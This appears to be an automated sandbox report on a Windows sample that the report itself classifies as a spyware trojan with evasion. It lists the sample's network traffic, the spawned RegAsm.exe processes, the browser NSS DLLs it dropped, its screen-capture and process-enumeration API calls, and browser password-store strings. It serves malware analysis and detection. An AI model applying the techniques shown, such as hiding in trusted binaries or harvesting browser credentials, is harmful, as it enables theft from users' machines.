Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.246.168:443 -> 192.168.2.4:49733 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00411DF0 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

4_2_00411DF0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091E0E3	0_2_0091E0E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E0160	0_2_008E0160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E4213	0_2_008E4213
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EC253	0_2_008EC253
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091E7BF	0_2_0091E7BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E4C33	0_2_008E4C33
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008DCF44	0_2_008DCF44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091D641	0_2_0091D641
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EDAD1	0_2_008EDAD1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091DB92	0_2_0091DB92
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091FCC8	0_2_0091FCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041D209	4_2_0041D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041E387	4_2_0041E387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041D75A	4_2_0041D75A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041F890	4_2_0041F890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A74CF0	4_2_19A74CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B15940	4_2_19B15940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A61C9E	4_2_19A61C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B89A20	4_2_19B89A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A62018	4_2_19A62018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19BC9CC0	4_2_19BC9CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A6292D	4_2_19A6292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A62AA9	4_2_19A62AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A612A8	4_2_19A612A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A79000	4_2_19A79000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B85040	4_2_19B85040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AF53B0	4_2_19AF53B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A63580	4_2_19A63580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19C3D209	4_2_19C3D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19BC9430	4_2_19BC9430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B09690	4_2_19B09690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A61EF1	4_2_19A61EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B64A60	4_2_19B64A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A88D2A	4_2_19A88D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AE8120	4_2_19AE8120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AE0090	4_2_19AE0090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B88030	4_2_19B88030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A63AB2	4_2_19A63AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19BA0480	4_2_19BA0480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A88763	4_2_19A88763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AC4760	4_2_19AC4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AF8760	4_2_19AF8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A88680	4_2_19A88680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A6251D	4_2_19A6251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A8BAB0	4_2_19A8BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A6290A	4_2_19A6290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A6174E	4_2_19A6174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A93370	4_2_19A93370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B469C0	4_2_19B469C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B7A900	4_2_19B7A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B5A940	4_2_19B5A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A6481D	4_2_19A6481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A63E3B	4_2_19A63E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B9E800	4_2_19B9E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A6EA80	4_2_19A6EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A6AA40	4_2_19A6AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A619DD	4_2_19A619DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AA6E80	4_2_19AA6E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AC2EE0	4_2_19AC2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19C3AEBE	4_2_19C3AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19AEA0B0	4_2_19AEA0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A6209F	4_2_19A6209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19B5A590	4_2_19B5A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A8A560	4_2_19A8A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A647AF	4_2_19A647AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A766C0	4_2_19A766C0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 008D72C0 appears 51 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19A63AF3 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19A61F5A appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C406B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19A6395E appears 78 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19A61C2B appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19A6415B appears 118 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004022D0 appears 286 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: .bsS ZLIB complexity 0.996881525954654

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/21@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00410B00 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,

4_2_00410B00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_004110A0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

4_2_004110A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199677575543[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.4.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.4.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: KJJECGHJDBFIJJJKEHCB.4.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.4.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.4.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
Source:	Binary string: nss3.pdb@ source: nss3[1].dll.4.dr, nss3.dll.4.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.4.dr, vcruntime140[1].dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.4.dr, msvcp140.dll.4.dr
Source:	Binary string: nss3.pdb source: nss3[1].dll.4.dr, nss3.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.4.dr
Source:	Binary string: mozglue.pdb source: mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.4.dr, softokn3.dll.4.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
